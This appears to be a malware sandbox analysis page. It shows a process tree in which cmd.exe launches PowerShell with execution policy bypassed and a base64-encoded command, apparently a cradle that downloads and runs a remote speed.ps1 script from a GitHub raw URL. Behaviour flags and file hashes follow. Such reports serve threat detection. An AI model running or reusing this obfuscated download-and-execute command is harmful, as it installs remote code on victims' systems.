C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:4008
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:3812
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4020
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
fbe1d2d9f17a1a7a0e534481748a89fc
SHA1ee97058aa9ff0ff9b3203fa816f0da9f15492843
SHA256ecaee54bb025bcaee3a7dbc5c84e2397db77d6a674f577174f0352070f6cb3e8
SHA51282269332201a75d7f36cdb7509d088d1a2afc679d9f578c7f10f502814a986d94b28b2e1226febb39a53fc3ae021440b647dd0e07fddbf8aff650929c5f74bad
-
MD5
5ed1574f5f1b016d4e9bcfd7449b6675
SHA171789bd89093ce2a938abb03234ef49d2bdb167a
SHA256b8ea7f56529dbd8cf6ae452f518f61e661a0875bb8a5bf0a28d64cd63f6687c6
SHA51224b5bef88868eecd39a9d5d9f9a2a61b01a4d52d36feefbf195ddbd5cd1e4c78c85c58c0fe9b4d4d5ad231fbdb38f2a757cd90655e60954c42aa2eeeae3422de
-
MD5
3447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
MD5
78fc438bc0a10f68012273374fc242de
SHA11c2f8f958b4cfb2d822a50f97c1b503d039108d4
SHA25614249168e782173812af05b444b582847646a69623a3254b8a590ba00365b4e0
SHA51297d287f9e1ac939505e3ff2b7d6854ae838dd4f0cc3699d157912dcbb116b709b30580baac4c4ce7a5384e28de841dd44f12006c4857bc6a72bc8758427f280e
-
MD5
d100ef4fd304d401b4b4b6b5609de42b
SHA1954b0ac7da9b65892078e9aeb6c8e93ef1f75d38
SHA256e1132c3f8e65454e63f2d8715710bb0dc461e74205e7fe6a414914c8ac619123
SHA5129880f20caa4437a70d47a22a64c2bb56cb1f35343c5aaae65b6c043f40b2e3b05ae99e387f6ba94d1aa21e65fb0da202450de4cf2da9602e4e93d862098ee229
-
MD5
4864fc038c0b4d61f508d402317c6e9a
SHA172171db3eea76ecff3f7f173b0de0d277b0fede7
SHA2560f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA5129e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
MD5
5dfde51bac009acc09ca1386d180eb91
SHA1eae3446e197188570a62108fba18a7533be854d4
SHA256fc3f53b5c5a20a2dcf0b43bee8b11daa9c815766695b5b2af309cb51afcf0eb7
SHA512a21dc36eda573465a5f45a9752bfc530219c3e65b4c71784d2557c0852fc937234f05fb5cb8f57786261da2d8f80e7beeb4682fda3484479f6bf7e53c445ae58
-
MD5
07044622ac01aea214d75af177a9976f
SHA18647e016414d4ef1da52abcf889210f15c58a640
SHA256e83dc368abf546e72a528509e3d2fd8e83153f783832abcef014cddb9da002e9
SHA51221b30facf460b9c93d32e1a54d6e5e2578f49c782eb3325268f83ad9beb14dd2c06b9b8337161099a69c1ad082583fdf94d20c7c4e2c91063e6bc0e6c9664324
-
MD5
7c2b6a91963747383e5cdb168539962c
SHA1cd987c6f69702bf0369b4c49c898052fae21d513
SHA256fc3c17833725d727590ef00fdf3f8d70f52d4c13a9cf52a77b6e74e22d7dae61
SHA5128a952e2e7ac644cb73bc35f1d099f8c9590027f5e5f89771131025ce878c000fec1aeaf708113889e1044094ebbc311ee46f945cca6946860705edac4eec8141